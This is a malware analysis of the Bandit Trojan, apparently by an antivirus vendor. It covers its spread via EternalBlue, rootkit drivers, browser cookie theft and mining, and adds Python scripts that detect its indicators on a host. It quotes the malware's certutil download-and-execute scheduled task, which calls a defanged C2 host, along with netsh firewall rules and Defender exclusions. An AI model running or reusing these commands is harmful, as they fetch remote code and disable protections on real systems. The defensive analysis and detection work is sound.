General explanation
Type: Trojan
Degree of destruction: high
Prevalence: high
Names of the malware:
- Trojan.Win32.Bandit.ApLib (Padvish)
- HEUR:Trojan.Win32.Chapak.pef (Kaspersky)
- TR/AD.GoCloudnet.irwn (Avira)
What is a Trojan?
Trojans are malware that present themselves as harmless, legitimate software and behave like useful applications, but cause extensive damage to the system once executed. Software downloaded from the internet, embedded HTML content, e-mail attachments, etc. are the usual ways Trojans enter a system. Unlike viruses and computer worms, Trojans do not replicate themselves.
What is Bandit Trojan?
Bandit is a Trojan that hides its files and processes using low-level (kernel-mode) Windows techniques. It uses EternalBlue to spread. It then downloads various modules from its command-and-control server and executes them on the victim’s system.
Technical explanation
Signs of infection
- A TestApp registry key whose sub-keys contain malicious domains (detailed below).
- Two scheduled tasks, one of which runs the malware’s update file and the other the malware’s main file on the system:
name : ScheduledUpdate
command : "cmd.exe /C certutil.exe -urlcache -split -f hxxps://bestblues[.]tech/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340"
scheduled : ONLOGON
name : csrss
command : "C:\Windows\rss\csrss.exe"
scheduled : ONLOGON
- A value in the Run registry key that executes the “C:\Windows\rss\csrss.exe” file.
- The following suspicious firewall rules:
Cmd.exe /c "netsh advfirewall firewall add rule name="csrss" dir="in" action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Cmd.exe /c "netsh advfirewall firewall add rule name="csrss" dir="in" action=allow program="%AppData%Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"
- The following items in the Windows Defender exclusion list:
• Files/Directories:
C:\Windows
C:\Windows\rss
%AppData%Roaming\EpicNet Inc\CloudNet
%AppData%Local\Temp\csrss
%AppData%\Roaming\WisprPine
C:\Windows\Windefender
%AppData%Local\Temp\Wup
C:\Windows\System32\drivers
• Processes: csrss.exe, cloudnet.exe, windefender.exe
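The indicators above can be checked against artefacts collected from a suspect host. The following Python script is an added example, not part of this write-up or of any Padvish tool: it parses constructed samples of `schtasks /query /v /fo csv` output, `netsh advfirewall firewall show rule name=all verbose` output and a Defender exclusion list (the kind of data `Get-MpPreference` reports), and returns the entries that match the task commands, firewall rules and exclusions listed above. The dumps are constructed for the example; the schtasks CSV is trimmed to the columns the script uses.

```python
"""Triage of the Bandit persistence indicators from collected host artefacts.

Added example (not part of the original write-up or any Padvish tool). All
sample dumps below are constructed to resemble real tool output.
"""
import csv
import io
import re

# Indicator patterns taken from the write-up.
TASK_RUN_PATTERNS = [
    re.compile(r"\\Windows\\rss\\csrss\.exe", re.I),
    re.compile(r"\\Temp\\csrss\\scheduled\.exe", re.I),
    re.compile(r"certutil(\.exe)?\s+-urlcache\s+-split\s+-f\s+\S+", re.I),
]
FIREWALL_PROGRAM_PATTERNS = [
    re.compile(r"\\Windows\\rss\\csrss\.exe$", re.I),
    re.compile(r"EpicNet Inc\\CloudNet\\cloudnet\.exe$", re.I),
]
EXCLUDED_PATHS = {p.lower() for p in (
    r"C:\Windows", r"C:\Windows\rss", r"C:\Windows\Windefender",
    r"C:\Windows\System32\drivers", r"%AppData%\Roaming\WisprPine",
    r"%AppData%Roaming\EpicNet Inc\CloudNet", r"%AppData%Local\Temp\csrss",
    r"%AppData%Local\Temp\Wup",
)}
EXCLUDED_PROCESSES = {"csrss.exe", "cloudnet.exe", "windefender.exe"}

# Constructed sample of `schtasks /query /v /fo csv` output (columns trimmed).
SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Schedule Type"
"WIN-HOST","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","Multiple schedule types"
"WIN-HOST","\ScheduledUpdate","cmd.exe /C certutil.exe -urlcache -split -f hxxps://bestblues[.]tech/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340","At logon time"
"WIN-HOST","\csrss","C:\Windows\rss\csrss.exe","At logon time"
'''

# Constructed sample of `netsh advfirewall firewall show rule name=all verbose` output.
NETSH_RULES = r'''
Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Direction:                            Out
Program:                              C:\Windows\system32\svchost.exe
Action:                               Allow

Rule Name:                            csrss
----------------------------------------------------------------------
Direction:                            In
Program:                              C:\Windows\rss\csrss.exe
Action:                               Allow

Rule Name:                            csrss
----------------------------------------------------------------------
Direction:                            In
Program:                              C:\Users\User\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
Action:                               Allow
'''

# Constructed Defender exclusion lists (as reported by Get-MpPreference).
DEFENDER_EXCLUSION_PATHS = [r"C:\Program Files\MyBackup", r"C:\Windows\rss", r"C:\Windows\Windefender"]
DEFENDER_EXCLUSION_PROCESSES = ["backup.exe", "cloudnet.exe", "windefender.exe"]


def parse_netsh_rules(text):
    """Split netsh 'show rule' output into one dict of fields per rule."""
    rules, current = [], {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("----"):
            continue
        key, sep, value = line.partition(":")   # first colon separates the field name
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Rule Name":                  # a new rule begins here
            current = {}
            rules.append(current)
        current[key] = value
    return rules


def suspicious_tasks(csv_text):
    """Names of scheduled tasks whose command matches a Bandit indicator."""
    names = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("Task To Run", "")
        if any(p.search(cmd) for p in TASK_RUN_PATTERNS):
            names.append(row["TaskName"].lstrip("\\"))
    return names


def suspicious_firewall_rules(netsh_text):
    """(rule name, program) for inbound allow rules on the Bandit binaries."""
    hits = []
    for rule in parse_netsh_rules(netsh_text):
        prog = rule.get("Program", "")
        if (rule.get("Direction") == "In" and rule.get("Action") == "Allow"
                and any(p.search(prog) for p in FIREWALL_PROGRAM_PATTERNS)):
            hits.append((rule["Rule Name"], prog))
    return hits


def suspicious_exclusions(paths, processes):
    """Defender exclusions that appear in the write-up's list."""
    return {"paths": sorted(p for p in paths if p.lower() in EXCLUDED_PATHS),
            "processes": sorted(p for p in processes if p.lower() in EXCLUDED_PROCESSES)}


def triage(csv_text=SCHTASKS_CSV, netsh_text=NETSH_RULES,
           excl_paths=DEFENDER_EXCLUSION_PATHS, excl_procs=DEFENDER_EXCLUSION_PROCESSES):
    return {"tasks": suspicious_tasks(csv_text),
            "firewall": suspicious_firewall_rules(netsh_text),
            "defender": suspicious_exclusions(excl_paths, excl_procs)}


if __name__ == "__main__":
    for section, hits in triage().items():
        print(section, "->", hits)
```

On a real host, replace the constructed strings with the saved output of the three commands; the parsers do not depend on the sample contents. Matching on the program path rather than the rule name matters because the rule name “csrss” is trivially changed, while the allow rule must still point at the binary the malware runs.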
Description of behaviour
Sandbox and VM detection
The malware runs checks to determine whether it is executing inside a virtual machine or a sandbox, and stops executing if it detects such an environment.
Malicious sub-keys of the TestApp registry key
As mentioned above, the malware creates a key named TestApp at HKCU\software\microsoft\TestApp. This key holds many sub-keys, such as the following (the contents, especially the server addresses, may differ between samples; newer variants of this malware also use a random string such as “dd47a129” in place of “TestApp”):
Key : HKCU\software\microsoft\TestApp
Subkeys :
Uuid = ""
command = ""
FirstInstallDate = "56268135e"
ServiceVersion = ""
SC = ""
PGDSE = ""
VC = ""
ServerVersion = "94"
CDN = "hxxps://bestblues[.]tech"
PP = ""
name = "SmallSea"
servers = "hxxps;//whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com"
firewall = ""
defender = ""
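One way to look for this key in a registry export, as an added example rather than code from the write-up: the Python script below parses a constructed `.reg` export of HKCU\Software\Microsoft, flags a child key named TestApp or named with an eight-character hexadecimal string (the newer variant’s naming mentioned above) that also carries the characteristic values (CDN, servers, FirstInstallDate, ServerVersion, name), and extracts the server addresses from the CDN and servers values. The export text is constructed for the example and copies the values listed above into a randomly named key; requiring three of the five marker values before reporting is an assumption made for this example.

```python
"""Spot the Bandit configuration key in a registry export.

Added example (not code from the write-up). The .reg text is constructed and
copies the values listed above into a randomly named key of the newer variant.
"""
import re

REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\software\microsoft\Notepad]
"lfFaceName"="Consolas"
"iPointSize"=dword:00000078

[HKEY_CURRENT_USER\software\microsoft\dd47a129]
"Uuid"=""
"command"=""
"FirstInstallDate"="56268135e"
"ServerVersion"="94"
"CDN"="hxxps://bestblues[.]tech"
"name"="SmallSea"
"servers"="hxxps;//whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com"
"firewall"=""
'''

PARENT_KEY = r"hkey_current_user\software\microsoft"   # parent of TestApp / random key
RANDOM_NAME = re.compile(r"^[0-9a-f]{8}$")             # e.g. dd47a129
# Value names that characterise the key; needing 3 of them is this example's assumption.
MARKER_VALUES = {"cdn", "servers", "firstinstalldate", "serverversion", "name"}
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')   # "name"=data


def unescape_reg_string(raw):
    """Turn a quoted .reg string literal into its value; other types stay raw."""
    if not (raw.startswith('"') and raw.endswith('"')):
        return raw                        # dword:/hex: data is kept as written
    return re.sub(r"\\(.)", r"\1", raw[1:-1])   # \\ -> \ and \" -> "


def parse_reg_export(text):
    """Parse .reg text into {key_path: {value_name: value}}; key paths lower-cased."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current] = {}
            continue
        m = VALUE_LINE.match(line)
        if current is not None and m:
            keys[current][m.group(1)] = unescape_reg_string(m.group(2))
    return keys


def extract_hosts(*values):
    """Pull host names out of the CDN/servers strings (defanging kept as stored)."""
    hosts = []
    for value in values:
        for token in value.split(","):
            token = re.sub(r"^\s*(?:hxxps?|https?)[:;]//", "", token).strip()
            if token:
                hosts.append(token)
    return hosts


def find_bandit_keys(text):
    """Report keys under HKCU\\software\\microsoft that look like the Bandit config key."""
    findings = []
    for path, values in parse_reg_export(text).items():
        parent, _, leaf = path.rpartition("\\")
        if parent != PARENT_KEY:
            continue
        if leaf == "testapp":
            reason = "TestApp key name"
        elif RANDOM_NAME.match(leaf):
            reason = "random 8-hex key name"
        else:
            continue
        lower = {k.lower(): v for k, v in values.items()}
        if len(set(lower) & MARKER_VALUES) < 3:
            continue                      # random name alone is not enough
        findings.append({"key": path, "reason": reason,
                         "c2": extract_hosts(lower.get("cdn", ""), lower.get("servers", ""))})
    return findings


if __name__ == "__main__":
    for f in find_bandit_keys(REG_EXPORT):
        print(f["key"], "-", f["reason"])
        print("  servers:", ", ".join(f["c2"]))
```

Run it against the output of `reg export HKCU\Software\Microsoft out.reg` from the suspect profile (the export is UTF-16 on disk, so decode it before passing the text in). Keying the check on the value set rather than only on the name is what lets it catch the variant that replaces “TestApp” with a random string.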
Creating the csrss process
After using privilege-escalation techniques, the malware creates the C:\Windows\rss directory, marks it as hidden, and copies its file into that path under the name csrss.exe.
Distribution in the local network
This malware spreads using tools that exploit the EternalBlue and DoublePulsar vulnerabilities. It identifies systems running vulnerable SMB versions at the network level and uses the vulnerability to execute the malware on them.
Downloading Drivers
The malware creates and runs three drivers:
- Winmon.sys driver: used to hide the malware’s processes.
- WinmonFs.sys driver: hides the malware’s directory and files from antivirus and monitoring tools.
- WinmonProcessMonitor driver: carries a long list of process names belonging to system-monitoring products, antivirus software, etc. Each time a process is created on the system, it checks that the new process’s name is not on this list; otherwise, it ends the malware’s execution.
Downloading and executing malware modules
- Browser Stealer module: steals cookies, history and local storage from browsers such as Chrome, Coccoc, Firefox, Opera and Yandex, and sends them to the server as a zip file.
- Router Exploit module: exploits router vulnerabilities at the network level.
- Collectchromefingerprint module: checks whether the Chrome browser is installed on the system and, if it is, opens the following link in it:
hxxps://swebgames[.]site/test.php?uuid=a1058f4a-2f08-4679-baf2-ae6c436cfaa5&browser=chrome
This link is a blank page that, in the background, runs the JavaScript library “DetectRTC” (https://github.com/muaz-khan/DetectRTC) to enumerate WebRTC features: whether the victim’s system has a microphone, speaker or webcam, the number of media devices, whether snapshots can be taken, etc. The results are sent to the following path:
hxxps://swebgames[.]site/fp.php
- Bot module: registers the victim’s system with the malware servers and then communicates with them repeatedly. One of these communications obtains a list of active pools of the Bitcoin network and connects to them to mine cryptocurrency on the victim’s system.
How to deal with it and disinfect the system
Padvish Antivirus detects and disinfects this malware. To prevent infection by malware that uses the EternalBlue vulnerability, it is recommended to apply the MS17-010 security patch provided by Microsoft. Padvish IPS detects malware that uses this kind of vulnerability and prevents it from entering the system.